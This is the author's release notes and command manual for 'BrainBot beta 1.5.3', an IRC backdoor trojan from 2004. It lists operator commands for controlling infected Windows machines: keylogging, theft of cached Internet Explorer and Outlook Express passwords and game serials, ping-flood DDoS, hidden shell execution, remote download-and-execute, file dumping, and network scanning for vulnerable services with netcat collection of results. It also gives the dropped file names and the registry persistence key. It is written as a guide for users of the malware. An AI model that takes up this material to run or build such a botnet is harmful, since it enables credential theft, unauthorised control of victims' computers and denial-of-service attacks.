BrainBot beta 1.5.3
(Backdoor.Win32.Brabot.b for Server builder.exe)

by Brainbuster

Written in Visual Basic

Released in September 2004

more versions

Changes in update to 1.5.3::

-added !uptime
-added !flood   (floods ports http requests)
-added !socks on/off  (starts a socks 4 on 1080) 

-fixed some bugs in connection procedure

Here is a List of all the commands to use with BrainBot beta ::

!login <PW>
The Bot only will accept Commands after u logged in with this command...
So your bots wont be took by some thiefs =).
<Pw> stands for the admin - Password you specified in the server builder- form

This will log u out so that the bot dont accepts comands anymore until u login again

forces the infected machine to reboot =D

forces the infected machine to shutdown -.-^^

This will show you some General Information abot the infected box=)

makes the bot leave the channel ^^

uninstall the bot from infected box

The bot will post some game serials if installed...
gonna add support for some more games in next version . :)

The bot or bots will flood the specified Host with fast permanent pings!
(such as DDoS... depends on how many bots u got =D)

turns keylogger on

turns keylogger off

shows all the logged keys

will clear the keylog file

I think this is the best feature in this bot:
the bot will post cached IE passes and Outlook express passes 

will download a file from <URL> to <target>

!execfile <location>
Executes the file in <location>

shows a list of the commands =)

shows you the current ip of infected box

!nick <Nick>
bot changes its nick to <Nick>

will show free disk space of infected machine

!spam <channel>
will start spamming the specified channel

stops spamming

!scan <Parameters>
scans with the Dfind-0.8 by by class101 
infos at:

use following parameters:
Usage: !scan <Option> [THREADS]

-p    <Port> <IP IP> .......... Scan one port on iprange     
+p    <Port> <IP IP> .......... Scan iprange,+logs ok,refused connections 
-p    <Port , Port> <IP IP> ... Scan two ports on iprange    
-p    <Port Port> <IP> ........ Scan a portrange on ip       
+p    <Port Port> <IP> ........ Scan portrange,+logs ok,refused connections 
-ban  <Port Port> <IP> ........ Scan portbanners on ip       
-ban  <Port> <IP IP> .......... Scan portbanners on iprange  
-cgi  <IP> .................... Scan cgi hole                
+ipc  <IP IP> ................. Scan IPC$ null on 139 & 445  
-ipc  <IP IP> ................. Scan IPC$ null on 139        
-ipc2 <IP IP> ................. Scan IPC$ null on 445        
-iis  <IP IP> ................. Scan IIS webservers          
-apa  <IP IP> ................. Scan Apache webservers       
-wdv  <IP IP> ................. Scan WebDav on IIS5.0        
-hpj  <IP IP> ................. Scan HP Web JetAdmin         
-msa  <IP IP> ................. Scan MSADC on webservers     
-ccb  <IP IP> ................. Scan CCBill WhereAmi         
-med  <IP IP> ................. Scan WMedia on webservers    
-php  <IP IP> ................. Scan phpBB on webservers     
-php2 <IP IP> ................. Scan PHP-Nuke on webservers  
-pso  <IP IP> ................. Scan PSOProxy Server         
-fro  <IP IP> ................. Scan frontpage host          
-rea  <IP IP> ................. Scan RealServer component    
-htr  <IP IP> ................. Scan +.htr hole              
-pri  <IP IP> ................. Scan .printer host           
-uni  <IP IP> ................. Scan unicode hole            
-idq  <IP IP> ................. Scan .idq host               
-cod  <IP IP> ................. Scan codered virus hole      
-opx  <IP IP> ................. Scan OptixPRO v1.0 => 1.32(include) hole
-rad  <IP IP> ................. Scan Radmin 2.1 Auth,NTAuth,NULL session
-sql  <IP IP> ................. Scan MS SQL Servers for weak access
-req  <REQ IP IP> ............. Scan File/Dir Request on webservers
gives you the scan results

!sendscan <Your IP> <NC Port>
The bot will connect to <Your IP> <NC Port> and echo the dfind results to it
You have to start nc with this parameters before: 
nc -l -p <port> >>dfind  =D

stops the current scanningprocess.
so u can clear the scanlogs by typing !shell del dfind

!cat <file>
echos any file from infected box

!raw <IRCcommand>
will execute <IRCcommand> 

!shell <commands>
will execute <commands> hidden on infected host
<commands> can be any dos command + parameters

!upgrade <upgradeURL>
<upgradeURL> is the URL of the new brainbot server. 
it will be downloaded and executed while the old infection is removed.
this way u can easy upgrade to another brainbot version or start using another rat/bot

!op <channel> <nick>
gives <nick> +o in <channel>
of course only if bot has op in that channel.

!deop <channel> <nick>
gives <nick> -o in <channel> (deop's him =D)
of course only if bot has op in that channel.

!msg <Nick/chan> <message>
Sends <message> to the chosen nick or chan =)



dropped files:
c:\WINNT\bootload.exe size: 332.734 bytes 
c:\WINNT\lEXPLORE.exe size: 21.296 bytes 
c:\WINNT\pws.exe      size: 34.416 bytes 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "bootloader"
data: C:\WINNT\bootload.exe 

tested on win2000
